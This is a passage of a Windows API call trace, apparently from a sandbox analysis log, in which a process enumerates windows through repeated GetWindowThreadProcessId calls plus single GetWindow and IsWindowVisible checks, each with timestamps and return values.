	[0413.224] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1148
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1160
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x10fc
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe34
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xea4
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x514
	[0413.224] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe48
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xbc8
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xdf8
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x318
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xcac
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x8bc
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf9c
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf48
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe40
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xecc
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xeb8
	[0413.225] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe80
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe98
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe60
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xee4
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf00
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xdf0
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe1c
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xdd0
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xd94
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xd74
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xd00
	[0413.226] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xcd8
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc84
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xca4
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc64
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc24
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb84
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xbac
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x384
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xab8
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x33c
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa44
	[0413.227] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa64
	[0413.228] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x8a8
	[0413.228] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xaf0
	[0413.228] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x88c
	[0413.228] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb04
	[0413.228] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x910
	[0413.229] GetWindow (hWnd=0x102b0, uCmd=0x4) returned 0x0
	[0413.229] IsWindowVisible (hWnd=0x102b0) returned 0
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x230
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xac0
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xab4
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xaac
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x3d0
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x978
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa7c
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x59c
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa88
	[0413.230] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa6c
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa68
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x9f8
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa04
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x924
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x8dc
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x7dc
	[0413.231] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x768
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x764
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x820
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x810
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x794
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x83c
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x7ac
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb44
	[0413.232] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb5c
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x838
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.233] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x818
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x5b8
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x494
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1ec
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x440
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x7e8
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x730
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x2c8
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x31c
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x330
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x128
	[0413.234] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x5c8
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x6f8
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x358
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x73c
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb0
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x250
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x240
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x790
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x61c
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x540
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x538
	[0413.235] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x568
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x538
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x568
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x538
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x540
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x540
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x57c
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x554
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x528
	[0413.236] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x79c
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4e0
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x44c
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x778
	[0413.237] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x460
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x558
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x4d0
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe04
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc94
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x13b0
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x13ac
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x13a8
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1374
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x132c
	[0413.238] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1328
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x12d0
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x12cc
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x12c8
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1290
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1218
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1214
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x11ec
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x11e8
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x11cc
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x1140
	[0413.239] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe6c
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x6e8
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc6c
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf94
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xffc
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf74
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf08
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf0c
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xed8
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xe90
	[0413.240] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xea8
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfa8
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfbc
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfb8
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfb4
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfb0
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfac
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfc0
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xfd0
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf88
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf84
	[0413.241] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xf80
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xde0
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xddc
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xdd8
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xd34
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xd10
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xd0c
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc9c
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc74
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc1c
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xc08
	[0413.242] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xabc
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x24c
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xbb0
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xbfc
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb10
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x374
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x368
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb28
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xae8
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb14
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x95c
	[0413.243] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa8c
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x46c
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb3c
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa90
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xad0
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa9c
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xaa0
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xb1c
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x7e0
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa74
	[0413.244] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x694
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0xa28
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x9b0
	[0413.245] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24d920 | out: lpdwProcessId=0x24d920) returned 0x8d8
